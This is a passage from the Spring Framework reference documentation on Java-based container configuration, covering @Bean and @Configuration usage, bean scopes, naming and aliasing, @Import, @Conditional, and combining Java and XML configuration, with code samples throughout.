-->\n\t\t<context-param>\n\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t<param-value>com.acme.AppConfig<\/param-value>\n\t\t<\/context-param>\n\n\t\t<!-- Bootstrap the root application context as usual using ContextLoaderListener -->\n\t\t<listener>\n\t\t\t<listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n\t\t<\/listener>\n\n\t\t<!-- Declare a Spring MVC DispatcherServlet as usual -->\n\t\t<servlet>\n\t\t\t<servlet-name>dispatcher<\/servlet-name>\n\t\t\t<servlet-class>org.springframework.web.servlet.DispatcherServlet<\/servlet-class>\n\t\t\t<!-- Configure DispatcherServlet to use AnnotationConfigWebApplicationContext\n\t\t\t\tinstead of the default XmlWebApplicationContext -->\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextClass<\/param-name>\n\t\t\t\t<param-value>\n\t\t\t\t\torg.springframework.web.context.support.AnnotationConfigWebApplicationContext\n\t\t\t\t<\/param-value>\n\t\t\t<\/init-param>\n\t\t\t<!-- Again, config locations must consist of one or more comma- or space-delimited\n\t\t\t\tand fully-qualified @Configuration classes -->\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t\t<param-value>com.acme.web.MvcConfig<\/param-value>\n\t\t\t<\/init-param>\n\t\t<\/servlet>\n\n\t\t<!-- map all requests for \/app\/* to the dispatcher servlet -->\n\t\t<servlet-mapping>\n\t\t\t<servlet-name>dispatcher<\/servlet-name>\n\t\t\t<url-pattern>\/app\/*<\/url-pattern>\n\t\t<\/servlet-mapping>\n\t<\/web-app>\n----\n\n\n\n[[beans-java-bean-annotation]]\n=== Using the @Bean annotation\n\n`@Bean` is a method-level annotation and a direct analog of the XML `<bean\/>` element.\nThe annotation supports some of the attributes offered by `<bean\/>`, such as:\n<<beans-factory-lifecycle-initializingbean,init-method>>,\n<<beans-factory-lifecycle-disposablebean,destroy-method>>,\n<<beans-factory-autowire,autowiring>> and `name`.\n\nYou can use the `@Bean` annotation in a `@Configuration`-annotated or in a\n`@Component`-annotated class.\n\n\n[[beans-java-declaring-a-bean]]\n==== Declaring a bean\n\nTo declare a bean, simply annotate a method with the `@Bean` annotation. You use this\nmethod to register a bean definition within an `ApplicationContext` of the type\nspecified as the method's return value. By default, the bean name will be the same as\nthe method name. The following is a simple example of a `@Bean` method declaration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl();\n\t\t}\n\n\t}\n----\n\nThe preceding configuration is exactly equivalent to the following Spring XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"transferService\" class=\"com.acme.TransferServiceImpl\"\/>\n\t<\/beans>\n----\n\nBoth declarations make a bean named `transferService` available in the\n`ApplicationContext`, bound to an object instance of type `TransferServiceImpl`:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\ntransferService -> com.acme.TransferServiceImpl\n----\n\n\n[[beans-java-dependencies]]\n==== Bean dependencies\n\nA `@Bean` annotated method can have an arbitrary number of parameters describing the\ndependencies required to build that bean. For instance if our `TransferService`\nrequires an `AccountRepository` we can materialize that dependency via a method\nparameter:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService(AccountRepository accountRepository) {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n----\n\nThe resolution mechanism is pretty much identical to constructor-based dependency\ninjection, see <<beans-constructor-injection,the relevant section>> for more details.\n\n\n[[beans-java-lifecycle-callbacks]]\n==== Receiving lifecycle callbacks\n\nAny classes defined with the `@Bean` annotation support the regular lifecycle callbacks\nand can use the `@PostConstruct` and `@PreDestroy` annotations from JSR-250, see\n<<beans-postconstruct-and-predestroy-annotations,JSR-250 annotations>> for further\ndetails.\n\nThe regular Spring <<beans-factory-nature,lifecycle>> callbacks are fully supported as\nwell. If a bean implements `InitializingBean`, `DisposableBean`, or `Lifecycle`, their\nrespective methods are called by the container.\n\nThe standard set of `*Aware` interfaces such as <<beans-beanfactory,BeanFactoryAware>>,\n<<beans-factory-aware,BeanNameAware>>,\n<<context-functionality-messagesource,MessageSourceAware>>,\n<<beans-factory-aware,ApplicationContextAware>>, and so on are also fully supported.\n\nThe `@Bean` annotation supports specifying arbitrary initialization and destruction\ncallback methods, much like Spring XML's `init-method` and `destroy-method` attributes\non the `bean` element:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Foo {\n\t\tpublic void init() {\n\t\t\t\/\/ initialization logic\n\t\t}\n\t}\n\n\tpublic class Bar {\n\t\tpublic void cleanup() {\n\t\t\t\/\/ destruction logic\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(initMethod = \"init\")\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t\t@Bean(destroyMethod = \"cleanup\")\n\t\tpublic Bar bar() {\n\t\t\treturn new Bar();\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nBy default, beans defined using Java config that have a public `close` or `shutdown`\nmethod are automatically enlisted with a destruction callback. If you have a public\n`close` or `shutdown` method and you do not wish for it to be called when the container\nshuts down, simply add `@Bean(destroyMethod=\"\")` to your bean definition to disable the\ndefault `(inferred)` mode.\n\nYou may want to do that by default for a resource that you acquire via JNDI as its\nlifecycle is managed outside the application. In particular, make sure to always do it\nfor a `DataSource` as it is known to be problematic on Java EE application servers.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\tpublic DataSource dataSource() throws NamingException {\n\t\treturn (DataSource) jndiTemplate.lookup(\"MyDS\");\n\t}\n----\n\nAlso, with `@Bean` methods, you will typically choose to use programmatic JNDI lookups:\neither using Spring's `JndiTemplate`\/`JndiLocatorDelegate` helpers or straight JNDI\n`InitialContext` usage, but not the `JndiObjectFactoryBean` variant which would force\nyou to declare the return type as the `FactoryBean` type instead of the actual target\ntype, making it harder to use for cross-reference calls in other `@Bean` methods that\nintend to refer to the provided resource here.\n====\n\nOf course, in the case of `Foo` above, it would be equally as valid to call the `init()`\nmethod directly during construction:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\t\t@Bean\n\t\tpublic Foo foo() {\n\t\t\tFoo foo = new Foo();\n\t\t\tfoo.init();\n\t\t return foo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[TIP]\n====\n\nWhen you work directly in Java, you can do anything you like with your objects and do\nnot always need to rely on the container lifecycle!\n====\n\n\n[[beans-java-specifying-bean-scope]]\n==== Specifying bean scope\n\n[[beans-java-available-scopes]]\n===== Using the @Scope annotation\n\nYou can specify that your beans defined with the `@Bean` annotation should have a\nspecific scope. You can use any of the standard scopes specified in the\n<<beans-factory-scopes,Bean Scopes>> section.\n\nThe default scope is `singleton`, but you can override this with the `@Scope` annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\t**@Scope(\"prototype\")**\n\t\tpublic Encryptor encryptor() {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\n[[beans-java-scoped-proxy]]\n===== @Scope and scoped-proxy\n\nSpring offers a convenient way of working with scoped dependencies through\n<<beans-factory-scopes-other-injection,scoped proxies>>. The easiest way to create such\na proxy when using the XML configuration is the `<aop:scoped-proxy\/>` element.\nConfiguring your beans in Java with a @Scope annotation offers equivalent support with\nthe proxyMode attribute. The default is no proxy ( `ScopedProxyMode.NO`), but you can\nspecify `ScopedProxyMode.TARGET_CLASS` or `ScopedProxyMode.INTERFACES`.\n\nIf you port the scoped proxy example from the XML reference documentation (see preceding\nlink) to our `@Bean` using Java, it would look like the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ an HTTP Session-scoped bean exposed as a proxy\n\t@Bean\n\t**@SessionScope**\n\tpublic UserPreferences userPreferences() {\n\t\treturn new UserPreferences();\n\t}\n\n\t@Bean\n\tpublic Service userService() {\n\t\tUserService service = new SimpleUserService();\n\t\t\/\/ a reference to the proxied userPreferences bean\n\t\tservice.setUserPreferences(userPreferences());\n\t\treturn service;\n\t}\n----\n\n\n[[beans-java-customizing-bean-naming]]\n==== Customizing bean naming\n\nBy default, configuration classes use a `@Bean` method's name as the name of the\nresulting bean. This functionality can be overridden, however, with the `name` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(name = \"myFoo\")\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-bean-aliasing]]\n==== Bean aliasing\n\nAs discussed in <<beans-beanname>>, it is sometimes desirable to give a single bean\nmultiple names, otherwise known as __bean aliasing__. The `name` attribute of the `@Bean`\nannotation accepts a String array for this purpose.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(name = { \"dataSource\", \"subsystemA-dataSource\", \"subsystemB-dataSource\" })\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ instantiate, configure and return DataSource bean...\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-bean-description]]\n==== Bean description\n\nSometimes it is helpful to provide a more detailed textual description of a bean. This can\nbe particularly useful when beans are exposed (perhaps via JMX) for monitoring purposes.\n\nTo add a description to a `@Bean` the\n{api-spring-framework}\/context\/annotation\/Description.html[`@Description`]\nannotation can be used:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\t**@Description(\"Provides a basic example of a bean\")**\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-configuration-annotation]]\n=== Using the @Configuration annotation\n\n`@Configuration` is a class-level annotation indicating that an object is a source of\nbean definitions. `@Configuration` classes declare beans via public `@Bean` annotated\nmethods. Calls to `@Bean` methods on `@Configuration` classes can also be used to define\ninter-bean dependencies. See <<beans-java-basic-concepts>> for a general introduction.\n\n\n[[beans-java-injecting-dependencies]]\n==== Injecting inter-bean dependencies\n\nWhen ``@Bean``s have dependencies on one another, expressing that dependency is as simple\nas having one bean method call another:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo(bar());\n\t\t}\n\n\t\t@Bean\n\t\tpublic Bar bar() {\n\t\t\treturn new Bar();\n\t\t}\n\n\t}\n----\n\nIn the example above, the `foo` bean receives a reference to `bar` via constructor\ninjection.\n\n[NOTE]\n====\nThis method of declaring inter-bean dependencies only works when the `@Bean` method is\ndeclared within a `@Configuration` class. You cannot declare inter-bean dependencies\nusing plain `@Component` classes.\n====\n\n\n[[beans-java-method-injection]]\n==== Lookup method injection\n\nAs noted earlier, <<beans-factory-method-injection,lookup method injection>> is an\nadvanced feature that you should use rarely. It is useful in cases where a\nsingleton-scoped bean has a dependency on a prototype-scoped bean. Using Java for this\ntype of configuration provides a natural means for implementing this pattern.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\t\tpublic Object process(Object commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command interface\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t\/\/ okay... but where is the implementation of this method?\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nUsing Java-configuration support , you can create a subclass of `CommandManager` where\nthe abstract `createCommand()` method is overridden in such a way that it looks up a new\n(prototype) command object:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\t@Scope(\"prototype\")\n\tpublic AsyncCommand asyncCommand() {\n\t\tAsyncCommand command = new AsyncCommand();\n\t\t\/\/ inject dependencies here as required\n\t\treturn command;\n\t}\n\n\t@Bean\n\tpublic CommandManager commandManager() {\n\t\t\/\/ return new anonymous implementation of CommandManager with command() overridden\n\t\t\/\/ to return a new prototype Command object\n\t\treturn new CommandManager() {\n\t\t\tprotected Command createCommand() {\n\t\t\t\treturn asyncCommand();\n\t\t\t}\n\t\t}\n\t}\n----\n\n\n[[beans-java-further-information-java-config]]\n==== Further information about how Java-based configuration works internally\n\nThe following example shows a `@Bean` annotated method being called twice:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic ClientService clientService1() {\n\t\t\tClientServiceImpl clientService = new ClientServiceImpl();\n\t\t\tclientService.setClientDao(clientDao());\n\t\t\treturn clientService;\n\t\t}\n\n\t\t@Bean\n\t\tpublic ClientService clientService2() {\n\t\t\tClientServiceImpl clientService = new ClientServiceImpl();\n\t\t\tclientService.setClientDao(clientDao());\n\t\t\treturn clientService;\n\t\t}\n\n\t\t@Bean\n\t\tpublic ClientDao clientDao() {\n\t\t\treturn new ClientDaoImpl();\n\t\t}\n\n\t}\n----\n\n`clientDao()` has been called once in `clientService1()` and once in `clientService2()`.\nSince this method creates a new instance of `ClientDaoImpl` and returns it, you would\nnormally expect having 2 instances (one for each service). That definitely would be\nproblematic: in Spring, instantiated beans have a `singleton` scope by default. This is\nwhere the magic comes in: All `@Configuration` classes are subclassed at startup-time\nwith `CGLIB`. In the subclass, the child method checks the container first for any\ncached (scoped) beans before it calls the parent method and creates a new instance. Note\nthat as of Spring 3.2, it is no longer necessary to add CGLIB to your classpath because\nCGLIB classes have been repackaged under `org.springframework.cglib` and included directly\nwithin the spring-core JAR.\n\n[NOTE]\n====\nThe behavior could be different according to the scope of your bean. We are talking\nabout singletons here.\n====\n\n[TIP]\n====\nThere are a few restrictions due to the fact that CGLIB dynamically adds features at\nstartup-time, in particular that configuration classes must not be final. However, as\nof 4.3, any constructors are allowed on configuration classes, including the use of\n`@Autowired` or a single non-default constructor declaration for default injection.\n\nIf you prefer to avoid any CGLIB-imposed limitations, consider declaring your `@Bean`\nmethods on non-`@Configuration` classes, e.g. on plain `@Component` classes instead.\nCross-method calls between `@Bean` methods won't get intercepted then, so you'll have\nto exclusively rely on dependency injection at the constructor or method level there.\n====\n\n\n\n[[beans-java-composing-configuration-classes]]\n=== Composing Java-based configurations\n\n\n[[beans-java-using-import]]\n==== Using the @Import annotation\n\nMuch as the `<import\/>` element is used within Spring XML files to aid in modularizing\nconfigurations, the `@Import` annotation allows for loading `@Bean` definitions from\nanother configuration class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ConfigA {\n\n\t \t@Bean\n\t\tpublic A a() {\n\t\t\treturn new A();\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import(ConfigA.class)\n\tpublic class ConfigB {\n\n\t\t@Bean\n\t\tpublic B b() {\n\t\t\treturn new B();\n\t\t}\n\n\t}\n----\n\nNow, rather than needing to specify both `ConfigA.class` and `ConfigB.class` when\ninstantiating the context, only `ConfigB` needs to be supplied explicitly:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(ConfigB.class);\n\n\t\t\/\/ now both beans A and B will be available...\n\t\tA a = ctx.getBean(A.class);\n\t\tB b = ctx.getBean(B.class);\n\t}\n----\n\nThis approach simplifies container instantiation, as only one class needs to be dealt\nwith, rather than requiring the developer to remember a potentially large number of\n`@Configuration` classes during construction.\n\n[TIP]\n====\nAs of Spring Framework 4.2, `@Import` also supports references to regular component\nclasses, analogous to the `AnnotationConfigApplicationContext.register` method.\nThis is particularly useful if you'd like to avoid component scanning, using a few\nconfiguration classes as entry points for explicitly defining all your components.\n====\n\n[[beans-java-injecting-imported-beans]]\n===== Injecting dependencies on imported @Bean definitions\n\nThe example above works, but is simplistic. In most practical scenarios, beans will have\ndependencies on one another across configuration classes. When using XML, this is not an\nissue, per se, because there is no compiler involved, and one can simply declare\n`ref=\"someBean\"` and trust that Spring will work it out during container initialization.\nOf course, when using `@Configuration` classes, the Java compiler places constraints on\nthe configuration model, in that references to other beans must be valid Java syntax.\n\nFortunately, solving this problem is simple. As <<beans-java-dependencies,we already discussed>>,\n`@Bean` method can have an arbitrary number of parameters describing the bean\ndependencies. Let's consider a more real-world scenario with several `@Configuration`\nclasses, each depending on beans declared in the others:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService(AccountRepository accountRepository) {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n\n\t@Configuration\n\tpublic class RepositoryConfig {\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository(DataSource dataSource) {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, RepositoryConfig.class})\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return new DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\t\/\/ everything wires up across configuration classes...\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\nThere is another way to achieve the same result. Remember that `@Configuration` classes are\nultimately just another bean in the container: This means that they can take advantage of\n`@Autowired` and `@Value` injection etc just like any other bean!\n\n[WARNING]\n====\nMake sure that the dependencies you inject that way are of the simplest kind only. `@Configuration`\nclasses are processed quite early during the initialization of the context and forcing a dependency\nto be injected this way may lead to unexpected early initialization. Whenever possible, resort to\nparameter-based injection as in the example above.\n\nAlso, be particularly careful with `BeanPostProcessor` and `BeanFactoryPostProcessor` definitions\nvia `@Bean`. Those should usually be declared as `static @Bean` methods, not triggering the\ninstantiation of their containing configuration class. Otherwise, `@Autowired` and `@Value` won't\nwork on the configuration class itself since it is being created as a bean instance too early.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate AccountRepository accountRepository;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n\n\t@Configuration\n\tpublic class RepositoryConfig {\n\n\t\tprivate final DataSource dataSource;\n\n\t\t@Autowired\n\t\tpublic RepositoryConfig(DataSource dataSource) {\n\t\t\tthis.dataSource = dataSource;\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, RepositoryConfig.class})\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return new DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\t\/\/ everything wires up across configuration classes...\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\n[TIP]\n====\nConstructor injection in `@Configuration` classes is only supported as of Spring\nFramework 4.3. Note also that there is no need to specify `@Autowired` if the target\nbean defines only one constructor; in the example above, `@Autowired` is not necessary\non the `RepositoryConfig` constructor.\n====\n\n.[[beans-java-injecting-imported-beans-fq]]Fully-qualifying imported beans for ease of navigation\n--\nIn the scenario above, using `@Autowired` works well and provides the desired\nmodularity, but determining exactly where the autowired bean definitions are declared is\nstill somewhat ambiguous. For example, as a developer looking at `ServiceConfig`, how do\nyou know exactly where the `@Autowired AccountRepository` bean is declared? It's not\nexplicit in the code, and this may be just fine. Remember that the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite] provides tooling that\ncan render graphs showing how everything is wired up - that may be all you need. Also,\nyour Java IDE can easily find all declarations and uses of the `AccountRepository` type,\nand will quickly show you the location of `@Bean` methods that return that type.\n\nIn cases where this ambiguity is not acceptable and you wish to have direct navigation\nfrom within your IDE from one `@Configuration` class to another, consider autowiring the\nconfiguration classes themselves:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate RepositoryConfig repositoryConfig;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\t\/\/ navigate 'through' the config class to the @Bean method!\n\t\t\treturn new TransferServiceImpl(repositoryConfig.accountRepository());\n\t\t}\n\n\t}\n----\n\nIn the situation above, it is completely explicit where `AccountRepository` is defined.\nHowever, `ServiceConfig` is now tightly coupled to `RepositoryConfig`; that's the\ntradeoff. This tight coupling can be somewhat mitigated by using interface-based or\nabstract class-based `@Configuration` classes. Consider the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate RepositoryConfig repositoryConfig;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(repositoryConfig.accountRepository());\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic interface RepositoryConfig {\n\n\t\t@Bean\n\t\tAccountRepository accountRepository();\n\n\t}\n\n\t@Configuration\n\tpublic class DefaultRepositoryConfig implements RepositoryConfig {\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(...);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, DefaultRepositoryConfig.class}) \/\/ import the concrete config!\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\nNow `ServiceConfig` is loosely coupled with respect to the concrete\n`DefaultRepositoryConfig`, and built-in IDE tooling is still useful: it will be easy for\nthe developer to get a type hierarchy of `RepositoryConfig` implementations. In this\nway, navigating `@Configuration` classes and their dependencies becomes no different\nthan the usual process of navigating interface-based code.\n--\n\n\n[[beans-java-conditional]]\n==== Conditionally include @Configuration classes or @Bean methods\n\nIt is often useful to conditionally enable or disable a complete `@Configuration` class,\nor even individual `@Bean` methods, based on some arbitrary system state. One common\nexample of this is to use the `@Profile` annotation to activate beans only when a specific\nprofile has been enabled in the Spring `Environment` (see <<beans-definition-profiles>>\nfor details).\n\nThe `@Profile` annotation is actually implemented using a much more flexible annotation\ncalled {api-spring-framework}\/context\/annotation\/Conditional.html[`@Conditional`].\nThe `@Conditional` annotation indicates specific\n`org.springframework.context.annotation.Condition` implementations that should be\nconsulted before a `@Bean` is registered.\n\nImplementations of the `Condition` interface simply provide a `matches(...)`\nmethod that returns `true` or `false`. For example, here is the actual\n`Condition` implementation used for `@Profile`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Override\n\tpublic boolean matches(ConditionContext context, AnnotatedTypeMetadata metadata) {\n\t\tif (context.getEnvironment() != null) {\n\t\t\t\/\/ Read the @Profile annotation attributes\n\t\t\tMultiValueMap<String, Object> attrs = metadata.getAllAnnotationAttributes(Profile.class.getName());\n\t\t\tif (attrs != null) {\n\t\t\t\tfor (Object value : attrs.get(\"value\")) {\n\t\t\t\t\tif (context.getEnvironment().acceptsProfiles(((String[]) value))) {\n\t\t\t\t\t\treturn true;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false;\n\t\t\t}\n\t\t}\n\t\treturn true;\n\t}\n----\n\nSee the {api-spring-framework}\/context\/annotation\/Conditional.html[\n`@Conditional` javadocs] for more detail.\n\n[[beans-java-combining]]\n==== Combining Java and XML configuration\n\nSpring's `@Configuration` class support does not aim to be a 100% complete replacement\nfor Spring XML. Some facilities such as Spring XML namespaces remain an ideal way to\nconfigure the container. In cases where XML is convenient or necessary, you have a\nchoice: either instantiate the container in an \"XML-centric\" way using, for example,\n`ClassPathXmlApplicationContext`, or in a \"Java-centric\" fashion using\n`AnnotationConfigApplicationContext` and the `@ImportResource` annotation to import XML\nas needed.\n\n[[beans-java-combining-xml-centric]]\n===== XML-centric use of @Configuration classes\n\nIt may be preferable to bootstrap the Spring container from XML and include\n`@Configuration` classes in an ad-hoc fashion. For example, in a large existing codebase\nthat uses Spring XML, it will be easier to create `@Configuration` classes on an\nas-needed basis and include them from the existing XML files. Below you'll find the\noptions for using `@Configuration` classes in this kind of \"XML-centric\" situation.\n\n.[[beans-java-combining-xml-centric-declare-as-bean]]Declaring @Configuration classes as plain Spring `<bean\/>` elements\n--\nRemember that `@Configuration` classes are ultimately just bean definitions in the\ncontainer. In this example, we create a `@Configuration` class named `AppConfig` and\ninclude it within `system-test-config.xml` as a `<bean\/>` definition. Because\n`<context:annotation-config\/>` is switched on, the container will recognize the\n`@Configuration` annotation and process the `@Bean` methods declared in `AppConfig`\nproperly.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Autowired\n\t\tprivate DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferService(accountRepository());\n\t\t}\n\n\t}\n----\n\n*system-test-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<!-- enable processing of annotations such as @Autowired and @Configuration -->\n\t\t<context:annotation-config\/>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\n\t\t<bean class=\"com.acme.AppConfig\"\/>\n\n\t\t<bean class=\"org.springframework.jdbc.datasource.DriverManagerDataSource\">\n\t\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\n*jdbc.properties*:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.url=jdbc:hsqldb:hsql:\/\/localhost\/xdb\njdbc.username=sa\njdbc.password=\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"classpath:\/com\/acme\/system-test-config.xml\");\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nIn `system-test-config.xml` above, the `AppConfig` `<bean\/>` does not declare an `id`\nelement. While it would be acceptable to do so, it is unnecessary given that no other\nbean will ever refer to it, and it is unlikely that it will be explicitly fetched from\nthe container by name. Likewise with the `DataSource` bean - it is only ever autowired\nby type, so an explicit bean `id` is not strictly required.\n====\n--\n\n.[[beans-java-combining-xml-centric-component-scan]] Using <context:component-scan\/> to pick up `@Configuration` classes\n--\nBecause `@Configuration` is meta-annotated with `@Component`, `@Configuration`-annotated\nclasses are automatically candidates for component scanning. Using the same scenario as\nabove, we can redefine `system-test-config.xml` to take advantage of component-scanning.\nNote that in this case, we don't need to explicitly declare\n`<context:annotation-config\/>`, because `<context:component-scan\/>` enables the same\nfunctionality.\n\n*system-test-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<!-- picks up and registers AppConfig as a bean definition -->\n\t\t<context:component-scan base-package=\"com.acme\"\/>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\n\t\t<bean class=\"org.springframework.jdbc.datasource.DriverManagerDataSource\">\n\t\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n--\n\n[[beans-java-combining-java-centric]]\n===== @Configuration class-centric use of XML with @ImportResource\n\nIn applications where `@Configuration` classes are the primary mechanism for configuring\nthe container, it will still likely be necessary to use at least some XML. In these\nscenarios, simply use `@ImportResource` and define only as much XML as is needed. Doing\nso achieves a \"Java-centric\" approach to configuring the container and keeps XML to a\nbare minimum.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ImportResource(\"classpath:\/com\/acme\/properties-config.xml\")\n\tpublic class AppConfig {\n\n\t\t@Value(\"${jdbc.url}\")\n\t\tprivate String url;\n\n\t\t@Value(\"${jdbc.username}\")\n\t\tprivate String 